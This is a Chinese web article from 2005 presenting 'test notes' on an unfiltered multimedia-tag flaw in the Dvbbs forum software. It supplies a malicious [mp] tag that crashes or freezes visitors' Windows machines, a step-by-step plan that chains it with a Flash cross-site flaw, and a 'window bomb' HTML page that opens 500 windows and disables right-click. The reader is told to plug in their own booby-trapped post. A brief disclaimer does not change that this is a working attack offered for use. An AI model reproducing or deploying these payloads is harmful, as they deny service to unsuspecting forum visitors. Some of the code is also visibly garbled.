软件工程

本类阅读TOP10

·PHP4 + MYSQL + APACHE 在 WIN 系统下的安装、配置
·Linux 入门常用命令(1)
·Linux 入门常用命令(2)
·使用 DCPROMO/FORCEREMOVAL 命令强制将 Active Directory 域控制器降级
·DirectShow学习(八): CBaseRender类及相应Pin类的源代码分析
·基于ICE方式SIP信令穿透Symmetric NAT技术研究
·Windows 2003网络负载均衡的实现
·一网打尽Win十四种系统故障解决方法
·数百种 Windows 软件的免费替代品列表
·收藏---行百里半九十

分类导航
VC语言Delphi
VB语言ASP
PerlJava
Script数据库
其他语言游戏开发
文件格式网站制作
软件工程.NET开发
动网论坛多媒体标签未过滤漏洞

作者:未知 来源:月光软件站 加入时间:2005-2-28 月光软件站

动网论坛多媒体标签未过滤漏洞测试手记
今天在剑鹰看到这个漏洞的说明,就想测试一下,先找了个动网论坛,发贴的内容如下:
{mp=0,0}c:\ddos.rmi{/mp}
..........省去一部分。代码中记得把{}换成[]
经过测试,当贴中包含大概40个这样的语句时,就可以让WIN98内存耗尽而蓝屏。
对于WIN2000可以使CPU使用率达到满负荷,即使及时关掉IE的进程,系统仍然会出现一些不正常的现象,如右键菜单无法正常显示等。
再深入发展一下,结合动网前一段时间可以在FLASH中插入URL来跨站攻击的漏洞,如果我们在FLASH中制向的是我们特制的一个HTML页面,进入后会弹出N个包含了{mp=0,0}c:\ddos.rmi{/mp}语句的动网页面,就可以大大加强炸弹的威力(这么多进程你关那个啊,呵呵~~~)
攻击过程:
在一个动网发一个插入了非法的多媒体标签的帖子----做一个窗口炸弹的HTML页面,将URL指向插入了多媒体标签的动网页面-----将窗口炸弹的HTML页面的URL插入FLASH中---将FLASH发到目标论坛上??????????//这样别人访问了这个插入了FLASH的贴就中招了~~~~
以下是HTML的代码:
html>
<head>
<title>窗口炸弹</title>
</head>
<body>
<script language="jav*script">for(g=0;g<500;g++){window.open("www.cbhu.net")}</script>
<p><!--webbot bot="HTMLMarkup" startspan --><html>
<head>
</head>
<body>
<script language="JavaScript">
<!--
if (window.Event) 
document.captureEvents(Event.MOUSEUP);
function nocontextmenu()
{
event.cancelBubble = true
event.returnValue = false;
return false;
}
function norightclick(e)
{
if (window.Event)
{
 if (e.which == 2 || e.which == 3)
 return false;
}
else
 if (event.button == 2 || event.button == 3)
{
event.cancelBubble = true
event.returnValue = false;
 return false;
 }
}
document.oncontextmenu = nocontextmenu;??// for IE5+
document.onmousedown = norightclick;??// for all others
//-->
</script>
</body>
</html><!--webbot bot="HTMLMarkup" endspan -->
</p>
</body>
</html>
~~~~~~~~~~~~~~~END~~~~~~~~~~~~~~~~~
<script language="jav*script">for(g=0;g<500;g++){window.open("www.cbhu.net")}</script>
把这句中的www.cbhu.net换成你发准备好的插入了多媒体标签的动网页面就可以了~~
此文仅做为技术讨论之列,如果用于恶意破坏,后果将由你自来承担!!



相关文章

相关软件